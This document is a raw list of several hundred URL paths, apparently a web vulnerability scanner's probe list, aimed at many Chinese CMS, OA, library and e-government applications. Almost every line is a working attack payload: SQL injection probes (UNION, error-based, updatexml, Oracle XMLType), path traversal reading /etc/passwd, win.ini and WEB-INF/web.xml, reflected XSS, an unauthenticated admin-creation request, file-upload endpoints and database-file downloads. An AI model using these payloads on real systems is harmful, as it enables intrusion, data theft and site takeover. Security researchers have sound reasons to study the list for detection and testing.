/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
